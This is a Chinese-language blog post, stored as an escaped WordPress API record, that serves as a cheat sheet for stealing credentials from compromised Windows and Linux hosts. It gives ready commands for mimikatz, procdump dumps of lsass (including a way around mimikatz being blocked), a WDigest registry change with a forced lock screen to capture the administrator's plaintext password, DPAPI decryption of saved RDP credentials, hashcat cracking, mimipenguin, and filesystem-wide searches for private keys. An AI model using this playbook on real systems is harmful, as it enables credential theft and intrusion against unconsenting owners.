\u603b\u7ed3:<\/p>\n\n\n\n
windows:<\/p>\n\n\n\n
mimikatz->\u76f4\u63a5\u8bfb\/\u95f4\u63a5\u8bfb–producmp\u5de5\u5177<\/p>\n\n\n\n
\u4fee\u6539\u6ce8\u518c\u8868->\u8bfb\u53d6\u660e\u6587Wdigest\t(\u9700\u901a\u8fc7cs\u9501\u5c4f->\u7cfb\u7edf\u7ba1\u7406\u5458\u91cd\u65b0\u8f93\u5165\u5bc6\u7801->\u83b7\u53d6\u660e\u6587\u5bc6\u7801)<\/p>\n\n\n\n
hashcat\u5f3a\u5236\u7206\u7834\t<\/p>\n\n\n\n
RDP\u51ed\u8bc1\u6293\u53d6\t\t(key->guidmasterkey->masterkey->\u5f97\u5230\u660e\u6587\u8d26\u53f7\u5bc6\u7801)<\/p>\n\n\n\n
linux:<\/p>\n\n\n\n
mimipenguin(\u7248\u672c\u53d7\u9650)\t\thashcat\u66b4\u529b\u7834\u89e3\t\u5bc6\u7801\u5b58\u50a8:ssh\u5bc6\u94a5<\/p>\n\n\n\n
windows-Mimikatz\u9002\u7528\u574f\u5883\uff1a\n\u5fae\u8f6f\u4e3a\u4e86\u9632\u6b62\u660e\u6587\u5bc6\u7801\u6cda\u9732\u53d1\u5e03\u4e86\u8865\u4e01KB2871997,\u5173\u95ed\u4e86Wdigest\u529f\u80fd\u3002\n\n\u5f53\u7cfb\u7edf\u4e3awin10\u62162012R2\u4ee5\u4e0a\u65f6\uff0c\u9ed8\u8ba4\u5728\u5185\u5b58\u7f13\u5b58\u7981\u6b62\u4fdd\u5b58\u660e\u6587\u5bc6\u7801\uff0c\n\u6b64\u65f6\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u6ce8\u518c\u8868\u7684\u65b9\u5f0f\u6293\u53d6\u660e\u6587\uff0c\u4f46\u9700\u8981\u7528\u6237\u91cd\u65b0\u767b\u5f55\u540e\u624d\u80fd\u6210\u529f\u6293\u53d6\u3002\n\u672c\u673a:\u8d26\u53f7\u5bc6\u7801(administrator)\n\u5176\u4ed6\u673a\u5668:\u8d26\u53f7\u5bc6\u7801<\/code><\/pre>\n\n\n\n\u5de5\u5177<\/p>\n\n\n\n
\u5fae\u8f6f\u81ea\u5e26=>https:\/\/learn.microsoft.com\/zh-cn\/sysinternals\/downloads\/procdump<\/p>\n\n\n\n
procdump=>\u6252\u53d6\u5bc6\u7801\u6587\u4ef6\t=>\u5c06lsass.dmp\u653e\u8fdbmimikatz\u8fd0\u884c<\/p>\n\n\n\n
\u7315\u7334\u6843=>https:\/\/github.com\/gentilkiwi\/mimikatz<\/p>\n\n\n\n
mimikatz<\/h4>\n\n\n\n\u76ee\u6807\u673a\u76f4\u63a5\u8bfb<\/h5>\n\n\n\nmimikatz.exe \"privilege:debug\"\"log\"\"sekurlsa:logonpasswords\"\t=>\u9700\u8981\u63d0\u6743\nCS\u76f4\u63a5\u63d2\u4ef6\u8bfb\u53d6(\u83b7\u53d6\u660e\u6587\u5bc6\u7801)\u3002\u6216\u8005\u4f1a\u8bdd\u4ea4\u4e92\u8fd0\u884c\u201clogonpasswords\u201d\u547d\u4ee4<\/code><\/pre>\n\n\n\n\u653b\u51fb\u7aef\u95f4\u63a5\u8bfb<\/h5>\n\n\n\n
producmp=>\u5c06\u5185\u5b58\u7a7a\u95f4\u590d\u5236\u4e0b\u6765\u4fdd\u5b58\u5230\u4e00\u4e2admp(\u8fdb\u5236\u4f4d)\u6587\u4ef6,\u4f20\u56de\u653b\u51fb\u7aef,\u653b\u51fb\u7aef\u5229\u7528\u7315\u7334\u6843\u89e3\u6790\u6587\u4ef6,\u83b7\u53d6\u5bc6\u7801\u51ed\u8bc1<\/p>\n\n\n\n
\u654f\u611f\u6570\u636e\u4e0b\u8f7d\u5230\u653b\u51fb\u7aef.\u7528\u653b\u51fb\u7aef\u7684mimikatz\u8bfb\u53d6\u5bc6\u7801\nhttps:\/learn.microsoft.com\/zh-cn\/sysinternals\/downloads\/procdump\n\u9488\u5bf9\u9632\u62a4\u62e6\u622a(Mimikatz\u88ab\u62e6\u622a)&\u9ad8\u7248\u672c\u4f46\u6709\u5b58\u50a8\uff08\u5185\u5b58\u8fd8\u6709\u6570\u636e\u7684\uff09\nprocdum\u6267\u884c=>\u9700\u9ad8\u6743\u9650\nProcdump.exe -accepteula -ma lsass.exe lsass.dmp\n\nmimikatz\u6267\u884c\nmimikatz.exe \"sekurlsa::minidump lsass.DMP\"\nsekurlsa::logonPasswords full\n\n\u5229\u7528procdump(\u7cfb\u7edf\u5de5\u5177),\u5728\u5185\u5b58\u91cc\u722c\u6570\u636e,\u4e0d\u4f1a\u89e3\u6790\u5bc6\u7801,\u4f1a\u5185\u5b58\u7a7a\u95f4\u590d\u5236\u4e0b\u6765(\u8fdb\u5236\u6587\u4ef6),\u8f6c\u6210dmp\u8fdb\u5236\u6587\u4ef6,\u628a\u6587\u4ef6\u4f20\u56de\u653b\u51fb\u7aef,\u653b\u51fb\u7aef\u5229\u7528\u7315\u7334\u6843\u89e3\u6790\u6587\u4ef6,\u83b7\u53d6\u5bc6\u7801&\u51ed\u636e<\/code><\/pre>\n\n\n\n\u4fee\u6539\u6ce8\u518c\u8868\u8bfb\u53d6\u660e\u6587<\/h4>\n\n\n\n\u4fee\u6539\u6ce8\u518c\u8868+\u5f3a\u5236\u9501\u5c4f+\u7b49\u5f85\u7cfb\u7edf\u7ba1\u7406\u5458\u91cd\u65b0\u767b\u5f55+\u622a\u53d6\u660e\u6587\u5bc6\u7801\n\u4fee\u6539\u6ce8\u518c\u8868\u6765\u8ba9Wdigest Auth\u4fdd\u5b58\u660e\u6587\u53e3\u4ee4\u65b9\u5f0f\nCS\u8fd0\u884c\u4e0b\u5217\u547d\u4ee4\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Control\\SecurityProviders\\WDigest\\ \/v\nUseLogonCredential \/t REG_DWORD \/d 1\n\u9501\u5c4f\u903c\u8feb\u7528\u6237\u91cd\u65b0\u8f93\u5165\u5bc6\u7801\u767b\u5f55\uff01\uff01\u2193\uff08\u4e0b\u56fe\u9501\u5c4f\u5e76\u91cd\u65b0\u6293\u53d6\u83b7\u5f97\u660e\u6587\u5bc6\u7801\uff09#\u6ce8\u610f\uff1a\u9501\u5c4f\u5f97\u662f\u76ee\u6807\u6743\u9650\u8d26\u6237\u3002\n\u4e0d\u8981\u7528\u63d0\u6743\u597d\u7684sys tem\u8d26\u6237<\/code><\/pre>\n\n\n\nhashcat\u66b4\u529b\u7834\u89e3\u83b7\u53d6\u5bc6\u7801<\/h4>\n\n\n\n\u53c2\u6570:\nhttp:\/\/blog.75271.com\/49299.html\n\u5728\u7ebf\nhttps:\/\/www.cmd5.com\/\nhttps:\/\/www.somd5.com\/\n\u5e94\u7528\nhttps:\/\/hashcat.net\/\n \n\u5b9e\u4f8b:\n\u9488\u5bf9\u5355\u4e2ahash\nhashcat.exe -a 0 -m 1000 518b98ad4178a53695dc997aa02d455c pass.txt<\/code><\/pre>\n\n\n\nRDP\u51ed\u636e\u6293\u53d6<\/h4>\n\n\n\n
(\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5->3389)<\/p>\n\n\n\n
shell cmdkey \/list\n\nshell dir \/a %userprofile%\\appdata\\local\\microsoft\\credentials\\*\t\u5f97\u5230key\u7edd\u5bf9\u5730\u5740\u4ee5\u53cakey\n\nmimikatz dpapi::cred \/in:\u4e0a\u9762\u83b7\u53d6\u7684key\u7684\u7edd\u5bf9\u5730\u5740\/key\t\t\u83b7\u53d6\u5230\u4e00\u4e2aguidmasterkey\u503c\n\nmimikatz sekurlsa::dpapi\t\/\/\u83b7\u53d6 guidmasterkey\u503c\u5bf9\u5e94\u7684masterkey\u503c\n\nmimikatz dpapi::cred \/in:<\u4e0a\u9762key\u503c\u6587\u4ef6\u5b8c\u6574\u8def\u5f84> \/masterkey:<\u83b7\u53d6\u5230\u7684masterkey\u503c>\t\u5f97\u5230\u660e\u6587\u8d26\u53f7\u5bc6\u7801<\/code><\/pre>\n\n\n\nLINUX\u5bc6\u7801\u8bfb\u53d6<\/h3>\n\n\n\nmimipenguin<\/h4>\n\n\n\n
\u9002\u7528\u7248\u672c<\/p>\n\n\n\n
Kali 4.3.0 (rolling)x64 (gdm3)\nUbuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-Oubuntu2)\nUbuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-Oubuntu2)\nXUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-Oubuntu2)\nVSFTPd 3.0.3-8+b1 (Active FTP client connections)\nApache2 2.4.25-3 (Active\/old HTTP BASIC AUTH Sessions)\nopenssh-server 1:7.3p1-1 (Active SSH connections sudo usage)<\/code><\/pre>\n\n\n\n\u5de5\u5177:\nmimipenguin\nhttps:\/\/github.com\/huntergregal\/mimipenguin\nchmod 755 .\/mimipenguin.sh\n.\/mimioenguin.sh <\/code><\/pre>\n\n\n\nhashcat\u66b4\u529b\u7834\u89e3<\/h4>\n\n\n\n\u5bc6\u7801\u5b58\u50a8:ssh\u5bc6\u94a5<\/h4>\n\n\n\nSSH\u5bc6\u5319\u662f\u4ec0\u4e48\uff1f\nSSH\u5bc6\u94a5\u662f\u4e00\u5bf9\u5bc6\u94a5\uff0c\u7531\u516c\u94a5\u548c\u79c1\u94a5\u7ec4\u6210\u3002\u5b83\u4eec\u7528\u4e8e\u8fdb\u884c\u5b89\u5168\u7684\u8eab\u4efd\u9a8c\u8bc1\u548c\u52a0\u5bc6\u901a\u4fe1\u3002\u5728SSH\u5bc6\u94a5\u8eab\u4efd\u9a8c\u8bc1\u4e2d\uff0c\u516c\u94a5\u76f8\u5f53\u4e8e\u9501\uff0c\u800c\u79c1\u94a5\u76f8\u5f53\u4e8e\u94a5\u5319\u3002\n\u8bb0\u4f4f\u5bc6\u7801--\u300b\u6587\u4ef6(SSH\u5bc6\u5319)---\u300b\u5b9e\u73b0\u767b\u5f55\n\n\u73af\u5883:centos7\n1.ssh-keygen\t(\u8981\u4fdd\u5b58\u5bc6\u94a5\u6587\u4ef6\u5728\u90a3|\u5bc6\u94a5\u9501\u7801)=>\u7ed9\u4f60\u4e00\u4e2a\u5bc6\u94a5\ncd .ssh\ncat id_rsa.pub >> authorized_keys\nvi \/etc\/ssh\/sshd_config\nRSAAuthentication yes\nPubkeyAuthentication yes\uff1a\nPermitRootLogin yes\nPasswordAuthentication no\n\nservice sshd restart\n\n\u9700\u8981\u8bb0\u4f4f\u5bc6\u7801\u7684\u65b0\u7528\u6237\nssh-copy-id -i ~\/.ssh\/id_rsa.pub <\u76ee\u6807\u670d\u52a1\u5668username>@<\u76ee\u6807\u670d\u52a1\u5668server_ip>\n\u76f4\u63a5\u767b\u5f55\nssh Jarun@<\u76ee\u6807\u670d\u52a1\u5668server_ip>\n\n\u654f\u611f\u6587\u4ef6\ncat ~\/.ssh\/config\t\t\t\t\t#\u770b\u7ba1\u7406ssh\u8fde\u63a5\u7684\u914d\u7f6e\u6587\u4ef6\ncat ~\/.ssh\/known_hosts\t\t\t#\u770b\u7528\u4e8e\u5b58\u50a8\u5df2\u77e5\u4e3b\u673a\u7684\u516c\u94a5\ncat ~\/.bash_history\t\t\t\t#\u770b\u5386\u53f2\u8bb0\u5f55\n\n#\u770b\u5386\u53f2\u8bb0\u5f55\n\u4e00\u822c\u60c5\u51b5\u4e0bSSH\u5bc6\u94a5\u5b58\u653e\u5728~\/.ssh\/\u76ee\u5f55\u4e0b\uff0c\u4e5f\u53ef\u4ee5\u6587\u4ef6\u4e2d\u641c\u7d22\u5df2\u4fdd\u5b58\u7684SSH\u51ed\u8bc1\n(\u5728\u6839\u76ee\u5f55\u53ca\u5176\u5b50\u76ee\u5f55\u4e2d\u641c\u7d22\u5305\u542b\u6307\u5b9a\u5b57\u7b26\u4e32\u7684\u6587\u4ef6)\ngrep -ir \"BEGIN RSA PRIVATE KEY\" \/*\ngrep -ir \"BEGIN DSA PRIVATE KEY\" \/*\ngrep -ir \"BEGIN OPENSSH PRIVATE KEY\" \/*<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"\u603b\u7ed3: windows: mimikatz->\u76f4\u63a5\u8bfb\/\u95f4\u63a5\u8bfb–producmp\u5de5\u5177 \u4fee\u6539\u6ce8\u518c\u8868-> … <\/p>\n","protected":false},"author":3,"featured_media":73,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-71","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/71","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":3,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"predecessor-version":[{"id":136,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions\/136"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/73"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}